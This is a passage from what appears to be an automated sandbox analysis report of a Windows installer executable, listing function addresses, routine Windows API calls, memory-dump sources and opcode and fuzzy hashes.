                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(?,00001004,?,00000014), ref: 0043FCBB
                                                                                                                                                                          • TranslateCharsetInfo.GDI32(00000000,?,00000002), ref: 0043FCD6
                                                                                                                                                                          • IsValidLocale.KERNEL32(?,00000001), ref: 0043FCEE
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InfoLocale$CharsetTranslateValid
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1865635962-0
                                                                                                                                                                          • Opcode ID: 8a826de0a7a4e57be8ecc05db1e7b23e13d85c8a2f564318947abef584fd7cf1
                                                                                                                                                                          • Instruction ID: 348cc59ed7b2327183995af3e406bbc7d54b55fdff87066bb2c5d927c77e1cdc
                                                                                                                                                                          • Opcode Fuzzy Hash: 8a826de0a7a4e57be8ecc05db1e7b23e13d85c8a2f564318947abef584fd7cf1
                                                                                                                                                                          • Instruction Fuzzy Hash: E8018030E00209AADB10DFB4AC49AAE77B8EB08B10F405136ED06D6290D774E9498B58
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00406A40, Relevance: 4.2, APIs: 1, Strings: 1, Instructions: 693COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: D@H
                                                                                                                                                                          • API String ID: 0-11303593
                                                                                                                                                                          • Opcode ID: c6908bc7e076f53624255c92aeb998977db4e1ff9d21a4eb9a10f36351c1e2e3
                                                                                                                                                                          • Instruction ID: 40f5e8f0d4d8c497b09300f8172240c06565cb039067412e4ec3e4d9ff932a27
                                                                                                                                                                          • Opcode Fuzzy Hash: c6908bc7e076f53624255c92aeb998977db4e1ff9d21a4eb9a10f36351c1e2e3
                                                                                                                                                                          • Instruction Fuzzy Hash: 05527DB1E012159FDB04CF59C4806AEBBB1BF88304F2581AED815BB381D779EE52CB95
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00409870, Relevance: 4.2, Strings: 3, Instructions: 412COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: (kH$@$hkH
                                                                                                                                                                          • API String ID: 0-1980855728
                                                                                                                                                                          • Opcode ID: a029a70163153bec89b86abc1386572daa34a9beb62653aaae3fb01c433ed88a
                                                                                                                                                                          • Instruction ID: 6ef26b75d1d2d9c52b39d731e61cae8b0f1bf4a451d348cac0e6ae675514a548
                                                                                                                                                                          • Opcode Fuzzy Hash: a029a70163153bec89b86abc1386572daa34a9beb62653aaae3fb01c433ed88a
                                                                                                                                                                          • Instruction Fuzzy Hash: 75F16B71E002588BDB24CFA9C5906ADB7B1FF89314F24816ED80AAB392D7399D46CF44
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00446490, Relevance: 3.9, Strings: 3, Instructions: 136COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: GetProcAddress$LoadLibraryExA$aryExA
                                                                                                                                                                          • API String ID: 0-2920269711
                                                                                                                                                                          • Opcode ID: 2f3a92986eaf651c49b717ac3ce8e463752147d74b3af29585d1c9e67a8752a7
                                                                                                                                                                          • Instruction ID: 73157195da90785db1fcaf639d895114dbb2e4225dd1f413bb0c45d0d4277a66
                                                                                                                                                                          • Opcode Fuzzy Hash: 2f3a92986eaf651c49b717ac3ce8e463752147d74b3af29585d1c9e67a8752a7
                                                                                                                                                                          • Instruction Fuzzy Hash: 2B71A3B0D04288DFDB05CFD8C594BDEBBF1AF59308F148149D4446B396C3BA6A49CBA5
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00438713, Relevance: 3.1, APIs: 2, Instructions: 60timeCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 0043871A
                                                                                                                                                                          • GetSystemTimeAsFileTime.KERNEL32(?,00000044,004386E6,?,?,00000005,0000086E,00000000, This setup was created with an EVALUATION VERSION of %s. Evaluation setups work for only %s hours after they were built. Please r,?,00000001,00000038,00437683,?,?,?), ref: 0043873C
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Time$FileH_prolog3_System
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 477554553-0
                                                                                                                                                                          • Opcode ID: 625e678968cca57c157a41be0733373dd9401183c91be9ec121fa21f101a81af
                                                                                                                                                                          • Instruction ID: 79b81e4cb9a482bff966da4c70e06e25a7d852853057af7068c7e89e4123d65d
                                                                                                                                                                          • Opcode Fuzzy Hash: 625e678968cca57c157a41be0733373dd9401183c91be9ec121fa21f101a81af
                                                                                                                                                                          • Instruction Fuzzy Hash: F3116A70A00308EFDF10EF90CD85A9EBB72BB49745F28442EF501A7291DB789D41CB59
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 004073B5, Relevance: 2.1, Strings: 1, Instructions: 860COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: PAH
                                                                                                                                                                          • API String ID: 0-43532356
                                                                                                                                                                          • Opcode ID: f16a86748d48a17072d58124d0ab927dfb2602f71a07600cf5860eb02b088bb7
                                                                                                                                                                          • Instruction ID: 7b7d1d28dce131da47382644d3749330c8f0b24aa3c2b352949f7381dfe18854
                                                                                                                                                                          • Opcode Fuzzy Hash: f16a86748d48a17072d58124d0ab927dfb2602f71a07600cf5860eb02b088bb7
                                                                                                                                                                          • Instruction Fuzzy Hash: F5724BB1E042199BCB04CF99C4906ADBBF1FF88314F2441AED815BB781D739AE42DB95
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00445612, Relevance: 1.7, APIs: 1, Instructions: 162COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • EncodePointer.KERNEL32(Function_000455CB), ref: 00445617
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: EncodePointer
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2118026453-0
                                                                                                                                                                          • Opcode ID: ad4ecbc08b5cbd257a6f42a44968156e5a5127b39a4de2d514ae8c75fb44d3da
                                                                                                                                                                          • Instruction ID: 67d65bc9023d703bb06d59326b6b4de182b0a554234b2f94215ab4e0a09c7f32
                                                                                                                                                                          • Opcode Fuzzy Hash: ad4ecbc08b5cbd257a6f42a44968156e5a5127b39a4de2d514ae8c75fb44d3da
                                                                                                                                                                          • Instruction Fuzzy Hash: 81418236700A44DFEB15CE98C9D0769B7A2FB8EB64F34007AE906D7712D7BAAC00D644
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00409140, Relevance: 1.6, Strings: 1, Instructions: 399COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: PAH
                                                                                                                                                                          • API String ID: 0-43532356
                                                                                                                                                                          • Opcode ID: f2164f16d81bf5b08068657ed3d6666131e76521e62120b97e348affb958449d
                                                                                                                                                                          • Instruction ID: b1da9771ae8f22596a465e110261cb4aa30778c3b8ad9e347ac52c038ea5d483
                                                                                                                                                                          • Opcode Fuzzy Hash: f2164f16d81bf5b08068657ed3d6666131e76521e62120b97e348affb958449d
                                                                                                                                                                          • Instruction Fuzzy Hash: DDE1B531A046569FCB08CF6CC5806ADBBF2EF89304F1485AAD495E7382D7399E46CB54
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00431AAB, Relevance: 1.5, APIs: 1, Instructions: 35comCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • CoCreateInstance.OLE32(0047D5E8,00000000,00000001,00483FA0,?), ref: 00431AD6
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateInstance
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 542301482-0
                                                                                                                                                                          • Opcode ID: 91ff789573837ecc24c67c9f7845786368b1126711f4d671552e16f6b99d2095
                                                                                                                                                                          • Instruction ID: 7dfdfb4c759cd9440f614d9787b893f5b3cd75d8ef2a8cd258633d15be3e31af
                                                                                                                                                                          • Opcode Fuzzy Hash: 91ff789573837ecc24c67c9f7845786368b1126711f4d671552e16f6b99d2095
                                                                                                                                                                          • Instruction Fuzzy Hash: 61F02E71301222A7C3209B49DCC0D47FBA8EF4CB617104227FA089B310D7709C50C7E8
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0043FD0E, Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(?,00001004,?,00000014,?,?,?,?,?,?,?,00000000,?,?,?,00000000), ref: 0043FD30
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InfoLocale
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2299586839-0
                                                                                                                                                                          • Opcode ID: 402103fe908f4fdbba871a76e6678005101bd62eaab9a6c50635c7b463e13cc6
                                                                                                                                                                          • Instruction ID: 4a94abd8e86c2b4b318adf9820102e80f85daa6e6f91d90a2124096070cdd8a5
                                                                                                                                                                          • Opcode Fuzzy Hash: 402103fe908f4fdbba871a76e6678005101bd62eaab9a6c50635c7b463e13cc6
                                                                                                                                                                          • Instruction Fuzzy Hash: 39F0A731A00108ABDB00EFB4CD459ED73FCEB0C714F50803AE511D7150DB30D9048758
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00458F45, Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetVersionExW.KERNEL32(?), ref: 00458F69
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Version
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1889659487-0
                                                                                                                                                                          • Opcode ID: 2948fcc731edb99d37c8c611bf9d3f5f819ef15e55cdcba535fe9e1d3eb5734e
                                                                                                                                                                          • Instruction ID: cf5d3cca8dad4fec357086e6e0e50f175719d895170d044e452b7b5c95b5203a
                                                                                                                                                                          • Opcode Fuzzy Hash: 2948fcc731edb99d37c8c611bf9d3f5f819ef15e55cdcba535fe9e1d3eb5734e
                                                                                                                                                                          • Instruction Fuzzy Hash: ADF03731A1010C9FDFA4EB6489462DAB3F56B09309F5000FED546E2152DD389A8D8A59
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0044A9CB, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0044A9D1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3192549508-0
                                                                                                                                                                          • Opcode ID: 203f1529596fdfb764c6a66e1c8501b5dbf6caaefccfe0b893ae7569693f62d0
                                                                                                                                                                          • Instruction ID: 4a1aa9b2ca55304aad44dc55aeab8f23e1abc3f89e5570b7a6db83f96d71bc94
                                                                                                                                                                          • Opcode Fuzzy Hash: 203f1529596fdfb764c6a66e1c8501b5dbf6caaefccfe0b893ae7569693f62d0
                                                                                                                                                                          • Instruction Fuzzy Hash: EDA0113000020CAB8A003B8AEC08888BF2EEA002A0B0080A0F80C000328B33A8A08A8A
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00407162, Relevance: 1.4, Strings: 1, Instructions: 177COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: X@H
                                                                                                                                                                          • API String ID: 0-361767101
                                                                                                                                                                          • Opcode ID: ffc877130de1722e3482dd5ac53eb8a52df6f34dc72517322caef677b8aabef9
                                                                                                                                                                          • Instruction ID: 8770b8da711c05f89826dbd8b4c1a4cb7cd16b6c2ead6c70de41dc9569c1382d
                                                                                                                                                                          • Opcode Fuzzy Hash: ffc877130de1722e3482dd5ac53eb8a52df6f34dc72517322caef677b8aabef9
                                                                                                                                                                          • Instruction Fuzzy Hash: 42618DB2E052158BCB18CF59C8402AEFBB1FF89314F2481BED818AB781C7759E41CB85
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00409580, Relevance: .2, Instructions: 189COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 9bed2fed0cb238441295c0b8acffe133f4c4c7283e70248d0d1c85d9cc5e9836
                                                                                                                                                                          • Instruction ID: 32c081486d45988937e31a5408c3f29f25550d82316aa6c43ba750c0ce5d5043
                                                                                                                                                                          • Opcode Fuzzy Hash: 9bed2fed0cb238441295c0b8acffe133f4c4c7283e70248d0d1c85d9cc5e9836
                                                                                                                                                                          • Instruction Fuzzy Hash: 6C7196316205528FE718EF1DFCD16793352E7C5311B898A3DDB0187396C639EA21C794
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00445620, Relevance: .2, Instructions: 161COMMON
                                                                                                                                                                          Download Yara Rule
